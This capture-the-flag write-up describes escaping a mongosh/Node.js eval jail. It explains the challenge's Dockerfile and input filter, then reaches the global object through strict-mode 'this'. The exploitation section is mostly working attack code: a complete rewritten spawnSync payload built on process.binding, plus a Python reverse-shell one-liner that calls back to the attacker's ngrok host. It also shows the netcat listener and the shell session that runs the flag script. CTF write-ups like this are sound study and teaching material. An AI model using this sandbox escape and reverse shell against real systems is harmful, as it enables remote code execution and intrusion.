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Table of Contents

  1. Overview
  2. Background
  3. Enumeration
  4. Exploitation
  5. Conclusion



Can you escape from Shibuya?

nc 28225


Note: There is a guide for this challenge here.


In this challenge, we can Netcat into the challenge instance:

└> nc 28225                              
Enter math expression:

Upon connecting, the server prompts me to enter a math expression.

Let's try to enter 7*7:

└> nc 28225                              
Enter math expression:

Yep. It respond 49.

In this challenge, we can also download a file:

└> file Zip archive data, at least v1.0 to extract, compression method=store
└> unzip 
   creating: chall/
 extracting: chall/          
  inflating: chall/Dockerfile        
  inflating: chall/          
  inflating: docker-compose.yml      

In chall/Dockerfile, we can see how the challenge instance's Docker container built:

FROM mongo:7.0.2-jammy

RUN apt-get update && apt-get install -y python3 python3-venv socat
RUN python3 -m venv /home/ctfuser/venv

WORKDIR /home/ctfuser
COPY /home/ctfuser/
RUN mv / /proof_$(head /dev/urandom | LC_ALL=C tr -dc A-Za-z0-9 | head -c 40).sh
RUN python3 -m compileall /home/ctfuser/
RUN chmod -R 555 /home/ctfuser/*
RUN chmod 555 /proof*.sh

USER mongodb
CMD socat TCP-LISTEN:1337,reuseaddr,fork EXEC:"stdbuf -i0 -o0 -e0 /home/ctfuser/venv/bin/python3 /home/ctfuser/"

First, it pulls the MongoDB version 7.0.2 Docker image, install Python 3 and socat.

Then, copy and to /home/ctfuser/.

Finally, using socat to setup a TCP listener on port 1337, and execute python3 /home/ctfuser/ when someone connected to the listener.

import subprocess

def main():
    print('Enter math expression:')
    script = input().replace('"','\\"').replace('\\','\\\\').replace("'","\\'")
    bad = "Object.keys(global).concat(module.constructor.builtinModules).concat(['require','module','globalThis']).filter((_)=>!/[@\\/-]/.test(_)).join(',')"
    jail = """'use strict';eval('(function('+%s+'){return eval("%s")})()')""" % (bad,script)
    proc = subprocess.Popen(["mongosh","--nodb","--quiet","--eval",jail], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)

if __name__ == '__main__':
        print('Unknown Error ??') # contact admin if you see this in production

In the above Python code, it takes the user's input and sanitize it. Then, it'll run mongosh --nodb --quiet --eval <jail>.

In MongoDB Shell (mongosh), the --eval option will evaluate a JavaScript expression. That being said, we can run the back-end version of JavaScript, Node.js.

Let's take a look at the sanitize part!

First, it'll escape "\' character. This ensure that we can't escape the eval("")'s double quotes.

Then, in bad variable, it concatenates all the built-in modules from the global object and some keywords like require, module, globalThis:

└> nodejs                           
> Object.keys(global).concat(module.constructor.builtinModules).concat(['require','module','globalThis']).filter((_)=>!/[@\\/-]/.test(_)).join(',')

Next, in jail variable, it looks like this:

'use strict';eval('(function('+<bad>+'){return eval("<script>")})()')

The use strict means all the JavaScript code can't use undeclared variables.

It also makes all the built-in modules and keywords from bad variable to undefined. That being said, we can't use those:

> eval('(function('+Object.keys(global).concat(module.constructor.builtinModules).concat(['require','module','globalThis']).filter((_)=>!/[@\\/-]/.test(_)).join(',')+'){return eval("require")})()')

So… How can we escape this MongoDB Shell (or basically Node.js) jail…

Based on my experience, I knew that some CTFs have similar challenge, and it's called "Node.js VM sandbox escape". This vm module allows JavaScript being executed in a sandbox environment. However, it's impossible to run code safely in a sandbox environment:

Since I know very little about this kind of sandbox escape, I have to lookup some writeups.

Eventually, I found this blog post about escaping Node.js sandboxes.

In that blog post, it mentioned that we can find a module via process.binding:


Wait… What's that this keyword??

In non-strict mode, this is always a reference to an object. In strict mode, it can be any value. (from

So this keyword is just referencing an object. In our case, it's referencing to the global object.

But hold up, it's different in strict mode:

The value passed as this to a function in strict mode is not forced into being an object (a.k.a. "boxed"). For a sloppy mode function, this is always an object: either the provided object, if called with an object-valued this; or the boxed value of this, if called with a primitive as this; or the global object, if called with undefined or null as this. (Use call, apply, or bind to specify a particular this.) Not only is automatic boxing a performance cost, but exposing the global object in browsers is a security hazard because the global object provides access to functionality that "secure" JavaScript environments must restrict. Thus for a strict mode function, the specified this is not boxed into an object, and if unspecified, this is undefined instead of globalThis (from

TL;DR: if this is used in strict mode, it should just return undefined instead of globalThis (non-strict mode this).

Luckily, the challenge didn't filter strict mode this keyword.


With that said, we can use the this keyword to get the global object:

└> nc 28225
Enter math expression:
  global: <ref *1> {
    global: [Circular *1],
    clearImmediate: [Function: clearImmediate],
    setImmediate: [Function: setImmediate] {
      [Symbol(nodejs.util.promisify.custom)]: [Getter]
    clearInterval: [Function: clearInterval],

Then, in the global object, we can get the process object, which is the current process (mongosh) object:

└> nc 28225
Enter math expression:
process {
  version: 'v20.6.1',
  versions: {
    node: '20.6.1',
    acorn: '8.10.0',

Next, in the process object, there's a binding function:

└> nc 28225
Enter math expression:
[Function: binding]

Which allows us to find a module like fs:

└> nc 28225
Enter math expression:
  access: [Function: access],
  close: [Function: close],
  open: [Function: open],
  openFileHandle: [Function: openFileHandle],
  read: [Function: read],
  readBuffers: [Function: readBuffers],
  fdatasync: [Function: fdatasync],
  fsync: [Function: fsync],
  rename: [Function: rename],
  ftruncate: [Function: ftruncate],
  rmdir: [Function: rmdir],
  mkdir: [Function: mkdir],

In the blog post that we've mentioned, we can execute system commands without require by using the rewrote version of spawnSync function in child_process module from

However, we need to make some changes:

  1. Change process.binding() to this.process.binding()
  2. Remove console.log()

Hence, the modified spawnSync function is:

spawn_sync = this.process.binding('spawn_sync'); normalizeSpawnArguments = function(c,b,a){if(Array.isArray(b)?b=b.slice(0):(a=b,b=[]),a===undefined&&(a={}),a=Object.assign({},a),{const g=[c].concat(b).join(' ');typeof'string'?'/bin/sh',b=['-c',g];}typeof a.argv0==='string'?b.unshift(a.argv0):b.unshift(c);var d=a.env||this.process.env;var e=[];for(var f in d)e.push(f+'='+d[f]);return{file:c,args:b,options:a,envPairs:e};};spawnSync = function(){var d=normalizeSpawnArguments.apply(null,arguments);var a=d.options;var c;if(a.file=d.file,a.args=d.args,a.envPairs=d.envPairs,a.stdio=[{type:'pipe',readable:!0,writable:!1},{type:'pipe',readable:!1,writable:!0},{type:'pipe',readable:!1,writable:!0}],a.input){var g=a.stdio[0]=util._extend({},a.stdio[0]);g.input=a.input;}for(c=0;c<a.stdio.length;c++){var e=a.stdio[c]&&a.stdio[c].input;if(e!=null){var f=a.stdio[c]=util._extend({},a.stdio[c]);isUint8Array(e)?f.input=e:f.input=Buffer.from(e,a.encoding);}};var b=spawn_sync.spawn(a);if(b.output&&a.encoding&&a.encoding!=='buffer')for(c=0;c<b.output.length;c++){if(!b.output[c])continue;b.output[c]=b.output[c].toString(a.encoding);}return b.stdout=b.output&&b.output[1],b.stderr=b.output&&b.output[2],b.error&&(b.error= b.error + 'spawnSync '+d.file,b.error.path=d.file,b.error.spawnargs=d.args.slice(1)),b;}

Finally, we can use the above modified spawnSync function to execute system commands.

To get a shell on the challenge instance, we can:

└> nc -lnvp 4444                    
listening on [any] 4444 ...
└> ngrok tcp 4444                   
Forwarding                    tcp:// -> localhost:4444

By doing this, the challenge instance can reach to our netcat listener.

└> nc 28225
Enter math expression:
spawn_sync = this.process.binding('spawn_sync'); normalizeSpawnArguments = function(c,b,a){if(Array.isArray(b)?b=b.slice(0):(a=b,b=[]),a===undefined&&(a={}),a=Object.assign({},a),{const g=[c].concat(b).join(' ');typeof'string'?'/bin/sh',b=['-c',g];}typeof a.argv0==='string'?b.unshift(a.argv0):b.unshift(c);var d=a.env||this.process.env;var e=[];for(var f in d)e.push(f+'='+d[f]);return{file:c,args:b,options:a,envPairs:e};};spawnSync = function(){var d=normalizeSpawnArguments.apply(null,arguments);var a=d.options;var c;if(a.file=d.file,a.args=d.args,a.envPairs=d.envPairs,a.stdio=[{type:'pipe',readable:!0,writable:!1},{type:'pipe',readable:!1,writable:!0},{type:'pipe',readable:!1,writable:!0}],a.input){var g=a.stdio[0]=util._extend({},a.stdio[0]);g.input=a.input;}for(c=0;c<a.stdio.length;c++){var e=a.stdio[c]&&a.stdio[c].input;if(e!=null){var f=a.stdio[c]=util._extend({},a.stdio[c]);isUint8Array(e)?f.input=e:f.input=Buffer.from(e,a.encoding);}};var b=spawn_sync.spawn(a);if(b.output&&a.encoding&&a.encoding!=='buffer')for(c=0;c<b.output.length;c++){if(!b.output[c])continue;b.output[c]=b.output[c].toString(a.encoding);}return b.stdout=b.output&&b.output[1],b.stderr=b.output&&b.output[2],b.error&&(b.error= b.error + 'spawnSync '+d.file,b.error.path=d.file,b.error.spawnargs=d.args.slice(1)),b;};spawnSync('python3',['-c','import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<your_ngrok_domain>",<your_ngrok_port>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);["/bin/sh","-i"]);']);

Note: Remeber to replace your own Ngrok domain and port number.

└> nc -lnvp 4444                    
listening on [any] 4444 ...
$ whoami;hostname;id
uid=999(mongodb) gid=999(mongodb) groups=999(mongodb)

Nice! I got a reverse shell on the challenge instance!

Let's run the script and get the flag!

$ ls -lah /
-r-xr-xr-x    1 root root   70 Nov  5 14:39
$ sh /


What we've learned:

  1. MongoDB shell jail escape & filter bypass